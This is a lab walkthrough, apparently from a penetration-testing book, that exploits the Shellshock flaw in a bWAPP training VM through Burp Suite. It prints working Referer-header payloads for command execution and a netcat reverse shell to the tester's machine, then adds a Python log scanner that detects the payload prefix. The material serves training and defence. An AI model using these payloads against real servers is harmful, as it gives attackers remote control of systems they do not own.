How to do it...

Browse to bee-box over HTTP (http://192.168.56.12/bWAPP/) and log in to start this exercise:

  1. In the Choose your bug: drop-down box, select Shellshock Vulnerability (CGI) and then click on Hack:

In the text, we can see something interesting: Current user: www-data. This may mean that the page is using system calls to get the username. It also gives us a hint to attack the Referer header.

  2. Let's see what is happening behind the scenes and use Burp Suite to record the requests and reload the page. If we look at the proxy's history:

We can see that there is an iframe calling a shell script: /cgi-bin/shellshock.sh, which might be the script vulnerable to Shellshock.

  3. Let's take the hint and try to attack the Referer of shellshock.sh. We first need to configure Burp Suite to intercept server responses. Go to Options in the Proxy tab and check the box with the text Intercept responses based on the following rules.
  4. Now, set Burp Suite to intercept and then reload shellshock.php.
  5. In Burp Suite, click Forward until you get to the GET request to /bWAPP/cgi-bin/shellshock.sh. Then, replace the Referer with () { :;}; echo "Vulnerable:" as shown in the following screenshot:

  6. Click Forward again, and once more in the request to the .ttf file, and then we should get the response from shellshock.sh, as shown in the following screenshot:

The response now has a new header called Vulnerable. This is because the server integrated the output of the echo command into the HTTP header we submitted; now we can take this further and execute more interesting commands.

  7. Now, try the () { :;}; echo "Vulnerable:" $(/bin/sh -c "/sbin/ifconfig") command. As the result shows, the command's result is included in the response header:
  8. Being able to execute commands remotely on a server is a huge advantage in a penetration test, and the next natural step is to obtain a remote shell, meaning a direct connection where we can send more elaborate commands. Open a Terminal in Kali Linux and set up a listening network port with the following command: nc -vlp 12345.
  9. Now go to Burp Suite proxy's history, select any request to shellshock.sh, right-click on it, and send it to the repeater.
  10. Once in the repeater, change the value of Referer to: () { :;}; echo "Vulnerable:" $(/bin/sh -c "nc -e /bin/bash 192.168.56.10 12345"). In this case, 192.168.56.10 is the address of our Kali machine.
  11. Click Go. If we check our Terminal, we can see the connection is established; issue a few commands to check whether or not we have a remote shell:
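As an added, defender-side example that is not part of the original exercise: every payload used above starts with the bash function definition `() {` inside a request header that CGI exports as an environment variable. The Python below (with constructed sample log lines modelled on the bee-box session, in Apache combined format) scans the Referer and User-Agent fields for that prefix and reports which requests, and whether they hit /cgi-bin/, carried it.

```python
import re

# Constructed sample access-log lines in Apache "combined" format, modelled on
# the bee-box session (Apache writes an embedded quote as \").
SAMPLE_LOG = [
    '192.168.56.10 - - [01/Jan/2020:10:00:01 +0000] "GET /bWAPP/shellshock.php HTTP/1.1" '
    '200 2048 "http://192.168.56.12/bWAPP/portal.php" "Mozilla/5.0"',
    '192.168.56.10 - - [01/Jan/2020:10:00:02 +0000] "GET /bWAPP/cgi-bin/shellshock.sh HTTP/1.1" '
    '200 512 "http://192.168.56.12/bWAPP/shellshock.php" "Mozilla/5.0"',
    '192.168.56.10 - - [01/Jan/2020:10:00:09 +0000] "GET /bWAPP/cgi-bin/shellshock.sh HTTP/1.1" '
    '200 540 "() { :;}; echo \\"Vulnerable:\\"" "Mozilla/5.0"',
    '192.168.56.10 - - [01/Jan/2020:10:00:15 +0000] "GET /bWAPP/cgi-bin/shellshock.sh HTTP/1.1" '
    '200 540 "-" "() {:;}; echo \\"Vulnerable:\\""',
]

# A Shellshock payload begins with a bash function definition "() {", with
# optional whitespace; the body and the commands after the brace vary, so
# match the prefix rather than any particular command.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Combined log format; quoted fields may contain backslash-escaped characters.
_QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + _QUOTED
    + r' (\d{3}) \S+ ' + _QUOTED + ' ' + _QUOTED + '$'
)


def is_shellshock_value(value):
    """True if a header value looks like a bash function-definition payload."""
    return SHELLSHOCK_RE.search(value) is not None


def find_shellshock(lines):
    """One finding per log line whose Referer or User-Agent carries a payload;
    'cgi' marks requests to /cgi-bin/, where the header reaches bash."""
    findings = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        ip, ts, request, status, referer, agent = m.groups()
        for header, value in (("Referer", referer), ("User-Agent", agent)):
            if is_shellshock_value(value):
                findings.append({"ip": ip, "time": ts, "request": request,
                                 "header": header, "value": value,
                                 "cgi": "/cgi-bin/" in request})
    return findings
```

Each finding can be turned straight into an alert or a block rule; a positive on a non-CGI path is still worth logging, since the same header may be replayed against CGI scripts later.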
